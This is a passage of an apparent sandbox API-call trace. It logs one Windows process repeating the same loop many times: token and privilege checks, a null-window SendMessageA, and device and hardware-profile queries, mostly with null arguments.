TokenHandle=0x18fe80*=0x0) returned 0 [0084.882] GetLastError () returned 0x3f0 [0084.882] GetCurrentProcess () returned 0xffffffff [0084.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.882] SetLastError (dwErrCode=0x522) [0084.882] CloseHandle (hObject=0x114) returned 1 [0084.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.882] GetLastError () returned 0x578 [0084.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.882] GetCurrentThread () returned 0xfffffffe [0084.882] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.882] GetLastError () returned 0x3f0 [0084.882] GetCurrentProcess () returned 0xffffffff [0084.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.882] SetLastError (dwErrCode=0x522) [0084.882] CloseHandle (hObject=0x114) returned 1 [0084.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.882] GetLastError () returned 0x578 [0084.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.882] GetCurrentThread () returned 0xfffffffe [0084.882] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.882] GetLastError () returned 0x3f0 [0084.882] GetCurrentProcess () returned 0xffffffff [0084.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.882] SetLastError (dwErrCode=0x522) [0084.882] CloseHandle (hObject=0x114) returned 1 [0084.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.882] GetLastError () returned 0x578 [0084.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.883] GetCurrentThread () returned 0xfffffffe [0084.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.883] GetLastError () returned 0x3f0 [0084.883] GetCurrentProcess () returned 0xffffffff [0084.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.883] SetLastError (dwErrCode=0x522) [0084.883] CloseHandle (hObject=0x114) returned 1 [0084.883] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.883] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.883] GetLastError () returned 0x578 [0084.883] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.883] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.883] GetCurrentThread () returned 0xfffffffe [0084.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.883] GetLastError () returned 0x3f0 [0084.883] GetCurrentProcess () returned 0xffffffff [0084.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.883] SetLastError (dwErrCode=0x522) [0084.883] CloseHandle (hObject=0x114) returned 1 [0084.883] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.883] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.883] GetLastError () returned 0x578 [0084.883] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.883] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.883] GetCurrentThread () returned 0xfffffffe [0084.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.883] GetLastError () returned 0x3f0 [0084.883] GetCurrentProcess () returned 0xffffffff [0084.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.883] SetLastError (dwErrCode=0x522) [0084.883] CloseHandle (hObject=0x114) returned 1 [0084.883] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.883] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.883] GetLastError () returned 0x578 [0084.883] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.883] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.883] GetCurrentThread () returned 0xfffffffe [0084.883] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.883] GetLastError () returned 0x3f0 [0084.883] GetCurrentProcess () returned 0xffffffff [0084.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.883] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.883] SetLastError (dwErrCode=0x522) [0084.883] CloseHandle (hObject=0x114) returned 1 [0084.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.884] GetLastError () returned 0x578 [0084.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.884] GetCurrentThread () returned 0xfffffffe [0084.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.884] GetLastError () returned 0x3f0 [0084.884] GetCurrentProcess () returned 0xffffffff [0084.884] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.884] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.884] SetLastError (dwErrCode=0x522) [0084.884] CloseHandle (hObject=0x114) returned 1 [0084.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.884] GetLastError () returned 0x578 [0084.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.884] GetCurrentThread () returned 0xfffffffe [0084.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.884] GetLastError () returned 0x3f0 [0084.884] GetCurrentProcess () returned 0xffffffff [0084.884] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.884] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.884] SetLastError (dwErrCode=0x522) [0084.884] CloseHandle (hObject=0x114) returned 1 [0084.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.884] GetLastError () returned 0x578 [0084.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.884] GetCurrentThread () returned 0xfffffffe [0084.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.884] GetLastError () returned 0x3f0 [0084.884] GetCurrentProcess () returned 0xffffffff [0084.884] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.884] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.884] SetLastError (dwErrCode=0x522) [0084.884] CloseHandle (hObject=0x114) returned 1 [0084.884] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.884] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.884] GetLastError () returned 0x578 [0084.884] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.884] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.884] GetCurrentThread () returned 0xfffffffe [0084.884] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.885] GetLastError () returned 0x3f0 [0084.885] GetCurrentProcess () returned 0xffffffff [0084.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.885] SetLastError (dwErrCode=0x522) [0084.885] CloseHandle (hObject=0x114) returned 1 [0084.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.885] GetLastError () returned 0x578 [0084.885] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.885] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.885] GetCurrentThread () returned 0xfffffffe [0084.885] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.885] GetLastError () returned 0x3f0 [0084.885] GetCurrentProcess () returned 0xffffffff [0084.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.885] SetLastError (dwErrCode=0x522) [0084.885] CloseHandle (hObject=0x114) returned 1 [0084.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.885] GetLastError () returned 0x578 [0084.885] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.885] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.885] GetCurrentThread () returned 0xfffffffe [0084.885] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.885] GetLastError () returned 0x3f0 [0084.885] GetCurrentProcess () returned 0xffffffff [0084.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.885] SetLastError (dwErrCode=0x522) [0084.885] CloseHandle (hObject=0x114) returned 1 [0084.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.885] GetLastError () returned 0x578 [0084.885] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.885] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.885] GetCurrentThread () returned 0xfffffffe [0084.885] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.885] GetLastError () returned 0x3f0 [0084.885] GetCurrentProcess () returned 0xffffffff [0084.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.885] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.885] SetLastError (dwErrCode=0x522) [0084.885] CloseHandle (hObject=0x114) returned 1 [0084.885] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.885] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.885] GetLastError () returned 0x578 [0084.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.886] GetCurrentThread () returned 0xfffffffe [0084.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.886] GetLastError () returned 0x3f0 [0084.886] GetCurrentProcess () returned 0xffffffff [0084.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.886] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.886] SetLastError (dwErrCode=0x522) [0084.886] CloseHandle (hObject=0x114) returned 1 [0084.886] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.886] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.886] GetLastError () returned 0x578 [0084.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.886] GetCurrentThread () returned 0xfffffffe [0084.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.886] GetLastError () returned 0x3f0 [0084.886] GetCurrentProcess () returned 0xffffffff [0084.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.886] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.886] SetLastError (dwErrCode=0x522) [0084.886] CloseHandle (hObject=0x114) returned 1 [0084.886] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.886] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.886] GetLastError () returned 0x578 [0084.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.886] GetCurrentThread () returned 0xfffffffe [0084.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.886] GetLastError () returned 0x3f0 [0084.886] GetCurrentProcess () returned 0xffffffff [0084.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.886] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.886] SetLastError (dwErrCode=0x522) [0084.886] CloseHandle (hObject=0x114) returned 1 [0084.886] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.886] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.886] GetLastError () returned 0x578 [0084.886] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.886] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.886] GetCurrentThread () returned 0xfffffffe [0084.886] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.886] GetLastError () returned 0x3f0 [0084.886] GetCurrentProcess () returned 0xffffffff [0084.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.887] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.887] SetLastError (dwErrCode=0x522) [0084.887] CloseHandle (hObject=0x114) returned 1 [0084.887] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.887] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.887] GetLastError () returned 0x578 [0084.887] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.887] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.887] GetCurrentThread () returned 0xfffffffe [0084.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.887] GetLastError () returned 0x3f0 [0084.887] GetCurrentProcess () returned 0xffffffff [0084.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.887] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.887] SetLastError (dwErrCode=0x522) [0084.887] CloseHandle (hObject=0x114) returned 1 [0084.887] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.887] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.887] GetLastError () returned 0x578 [0084.887] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.887] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.887] GetCurrentThread () returned 0xfffffffe [0084.887] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.887] GetLastError () returned 0x3f0 [0084.887] GetCurrentProcess () returned 0xffffffff [0084.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.887] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.887] SetLastError (dwErrCode=0x522) [0084.887] CloseHandle (hObject=0x114) returned 1 [0084.887] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.887] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.887] GetLastError () returned 0x578 [0084.887] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.887] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.888] GetCurrentThread () returned 0xfffffffe [0084.888] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.888] GetLastError () returned 0x3f0 [0084.888] GetCurrentProcess () returned 0xffffffff [0084.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.888] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.888] SetLastError (dwErrCode=0x522) [0084.888] CloseHandle (hObject=0x114) returned 1 [0084.888] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.888] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.888] GetLastError () returned 0x578 [0084.888] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.888] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.888] GetCurrentThread () returned 0xfffffffe [0084.888] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.888] GetLastError () returned 0x3f0 [0084.888] GetCurrentProcess () returned 0xffffffff [0084.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.888] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.888] SetLastError (dwErrCode=0x522) [0084.888] CloseHandle (hObject=0x114) returned 1 [0084.888] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.888] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.888] GetLastError () returned 0x578 [0084.888] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.888] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.888] GetCurrentThread () returned 0xfffffffe [0084.888] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, 